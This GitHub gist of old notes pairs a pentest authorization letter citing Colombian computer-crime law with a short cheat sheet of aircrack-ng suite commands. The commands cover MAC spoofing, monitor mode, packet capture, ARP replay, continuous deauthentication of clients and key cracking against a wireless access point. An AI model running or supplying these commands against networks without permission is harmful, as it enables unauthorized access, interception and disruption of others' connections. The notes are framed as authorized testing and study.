Skip to content

Instantly share code, notes, and snippets.

@h3ct0rjs
Created May 1, 2016 19:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save h3ct0rjs/eb2836ff701ee6d752b6b7cba4d2dbf8 to your computer and use it in GitHub Desktop.
Save h3ct0rjs/eb2836ff701ee6d752b6b7cba4d2dbf8 to your computer and use it in GitHub Desktop.
oldnotes.
July 29 2011
Dear Client
The pentest in your area will describe the issues for wireless networks in near area's,also the
implementation and testing will be done by hector Jimenez for simple pourpouses of study ,any malicious
activity or choice won't be part of pentester,H owever Law 1273 of 2009 The Colombian Republic Stablish:
"Articulo 1 ":
ARTÍCULO 269A. ACCESO ABUSIVO A UN SISTEMA INFORMÁTICO.
<Artículo adicionado por el artículo 1 dela Ley 1273 de 2009. El nuevo texto es el siguiente:>
El que, sin autorización o por fuera de lo acordado, acceda en todo o en parte a un sistema informático protegido
o no con una medida de seguridad, o se mantenga dentro del mismo en contra de la voluntad de quien tenga el legítimo
derecho a excluirlo, incurrirá en pena de prisión de cuarenta y ocho (48) a noventa y seis (96)
meses y en multa de 100 a 1.000 salarios mínimos legales mensuales vigentes.
ARTÍCULO 269C. INTERCEPTACIÓN DE DATOS INFORMÁTICOS. <Artículo adicionado por el artículo 1 de la
Ley 1273 de 2009. El nuevo texto es el siguiente:> El que, sin orden judicial previa intercepte
datos informáticos en su origen, destino o en el interior de un sistema informático, o la
emisiones electromagnéticas provenientes de un sistema informático que los transporte incurrirá
en pena de prisión de treinta yseis (36) a setenta y dos (72) meses.
The client will keep all responsability of all actions conducted by penetration tester in this
case Hector F. Jimenez.
If you agree with this please firm the same file with gpg or digital signature ! and give a copy to the Pentester
and keep a copy for you just in cases of troubles.
For this licences User Agreement dont aply :
Artículo 269E: Uso de software malicioso. El que, sin estar facultado para ello, produzca,
trafique, adquiera, distribuya, venda, envíe, introduzca o extraiga del territorio nacional
software malicioso u otros programas de computación de efectos dañinos,
incurrirá en pena de prisión de cuarenta y ocho (48) a noventa y seis (96) meses y
en multa de 100 a 1.000 salarios mínimos legales mensuales vigentes.
all md5sum apply here and all states .
Simple Sheetcheat ! I hope that this works in the future.
With client connect !
ifconfig
ifconfig wlan0 down
macchanger --random wlan0
ifconfig wlan0 up
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 1 -b XX:XX:XX:XX -w c1b3rh4ck mon0
aireplay-ng -1 0 -a XX:XX:XX:XX mon0
aireplay-ng -3 -b XX:XX:XX:XX mon0
aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack)
aircrack-ng c1b3rh4ck.cap or pcap !
without client the same but dont make the desauthentication coded by c1b3rh4ck :-D
xx:xx:xx:xx:xx << bssid of AP !
For crack Wpa-Wpa2 i would like to implement a new mathematical algoritm,may be before :-D cheerz
careloca de John !
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment